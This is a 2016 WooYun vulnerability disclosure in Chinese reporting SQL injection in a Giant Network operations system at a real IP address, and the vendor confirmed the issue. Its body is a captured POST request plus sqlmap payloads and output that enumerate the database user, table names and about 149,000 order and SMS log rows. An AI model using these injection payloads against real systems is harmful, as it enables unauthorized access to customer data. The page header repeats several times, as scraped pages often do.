巨人网络某系统SQL注入（再次测漏15万订单+15万日志）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169176

漏洞标题：巨人网络某系统SQL注入（再次测漏15万订单+15万日志）

漏洞作者：牛小帅

提交时间：2016-01-11 20:37

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-11：细节已通知厂商并且等待厂商处理中
2016-01-12：厂商已经确认，细节仅向厂商公开
2016-01-22：细节向核心白帽子及相关领域专家公开
2016-02-01：细节向普通白帽子公开
2016-02-11：细节向实习白帽子公开
2016-02-22：细节向公众公开

简要描述：

详细说明：

营运系统

http://222.73.243.217/

抓包：

POST /syswork/carryon/carryonlist.php HTTP/1.1
Host: 222.73.243.217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://222.73.243.217/syswork/carryon/carryonlist.php
Cookie: PHPSESSID=bess3o040r75dsr9cssnpb49s4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 135
__EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&game_type=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11&datetext=

多参数都存在注入：

Place: POST
Parameter: datetextE
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' AND 1919=1919
per'='aper&datetext=
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' AND (SELECT 46
M(SELECT COUNT(*),CONCAT(0x3a786c6f3a,(SELECT (CASE WHEN (4623=4623) THEN
 0 END)),0x3a6d6a6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER
GROUP BY x)a) AND 'fqTY'='fqTY&datetext=
    Type: UNION query
    Title: MySQL UNION query (NULL) - 16 columns
    Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' UNION ALL SELE
L, NULL, NULL, CONCAT(0x3a786c6f3a,0x57437461647077797a53,0x3a6d6a6b3a), N
ULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'nogZ
Z&datetext=
Place: POST
Parameter: datetextS
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11' AND 7224=7224 AND 'FgUt'='FgUt&date
2016-01-11&datetext=
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11' AND (SELECT 7654 FROM(SELECT COUNT(
CAT(0x3a786c6f3a,(SELECT (CASE WHEN (7654=7654) THEN 1 ELSE 0 END)),0x3a6d
,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) A
QO'='vsQO&datetextE=2016-01-11&datetext=
---
there were multiple injection points, please select the one to use for fol
 injections:
[0] place: POST, parameter: datetextE, type: Single quoted string (default
[1] place: POST, parameter: datetextS, type: Single quoted string
[q] Quit
>
[18:40:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
[18:40:52] [INFO] fetching current user
current user:    'uYW4Y7N27EDVL@10.240.31.6'

available databases [2]:
[*] information_schema
[*] mobilecsms

122表

Database: mobilecsms
[94 tables]
+---------------------------------------+
| KNOWLEDGE                             |
| K_SORTS                               |
| OPERATERECORD                         |
| SHIFTKNOWLEDGE                        |
| SHIFTOPERATERECORD                    |
| SK_SORTS                              |
| account_info_audited                  |
| account_info_audited_log              |
| account_invoice                       |
| account_label                         |
| account_label_to_uid                  |
| account_lock                          |
| account_old_player                    |
| account_query_log                     |
| base_gm_work_field                    |
| base_msg_work_field                   |
| basic_coding                          |
| basic_country                         |
| basic_dept                            |
| basic_faq_sort                        |
| basic_game                            |
| basic_group                           |
| basic_menu                            |
| basic_model                           |
| basic_page                            |
| basic_resource                        |
| basic_resource2dept                   |
| basic_resource2group                  |
| basic_resource2user                   |
| basic_resourceinpage                  |
| basic_role                            |
| basic_skfaq_sort                      |
| basic_treenode                        |
| basic_user                            |
| basic_user2role                       |
| basic_user_online                     |
| basic_userindept                      |
| basic_useringroup                     |
| call_num                              |
| call_sta_time                         |
| cs_carryon                            |
| cs_coutomerinfo                       |
| cs_coutomerinfo_history               |
| cs_dealwithorder                      |
| cs_dealwithorder_history              |
| cs_lost_reason                        |
| cs_lost_reason_order                  |
| cs_order                              |
| cs_order_history                      |
| cs_order_invalid                      |
| cs_order_print                        |
| cs_ordertype                          |
| cs_overtime_sta                       |
| cs_overtime_standard                  |
| cs_overtime_standard_tt               |
| cs_poll                               |
| cs_sta_cust_info                      |
| cs_sta_cust_info_tmp                  |
| cs_standard_reply                     |
| file_upload                           |
| game_gm_work_of_day                   |
| game_log_redeem                       |
| game_log_redeem_audit                 |
| game_msg_work_of_day                  |
| game_redeem                           |
| game_redeem_apply_user                |
| game_redeem_audit                     |
| game_redeem_audit_list                |
| game_redeem_audit_money               |
| game_redeem_item                      |
| game_zone_info                        |
| internal_account                      |
| log_account_disputed                  |
| log_account_rollback                  |
| log_account_rollback_balance          |
| log_fail_itil                         |
| log_gamerole_lock_unlock              |
| order_num_alert_time                  |
| pilfer_account_order                  |
| poll_rating                           |
| ps_template                           |
| ps_template_ordertype                 |
| question_agreement                    |
| question_element                      |
| question_list                         |
| question_table                        |
| role_separation_info                  |
| self_service_config                   |
| send_sms_log                          |
| test                                  |
| tmplog                                |
| uid_notcheck_pay                      |
| user_account_prerogative              |
| user_acotype                          |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Database: mobilecsms
+----------+---------+
| Table    | Entries |
+----------+---------+
| cs_order | 149141  |
+----------+---------+

15万日志

Database: mobilecsms
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| send_sms_log | 149379  |
+--------------+---------+

漏洞证明：

修复方案：

版权声明：转载请注明来源牛小帅@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-01-12 11:48

厂商回复：

感谢路人甲，此网站已限制访问

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169176

漏洞标题：巨人网络某系统SQL注入（再次测漏15万订单+15万日志）

相关厂商：巨人网络

漏洞作者：牛小帅

提交时间：2016-01-11 20:37

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源牛小帅@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169176

漏洞标题：巨人网络某系统SQL注入（再次测漏15万订单+15万日志）

相关厂商：巨人网络

漏洞作者： 牛 小 帅

提交时间：2016-01-11 20:37

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0169176"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 牛 小 帅@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：牛小帅

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源牛小帅@乌云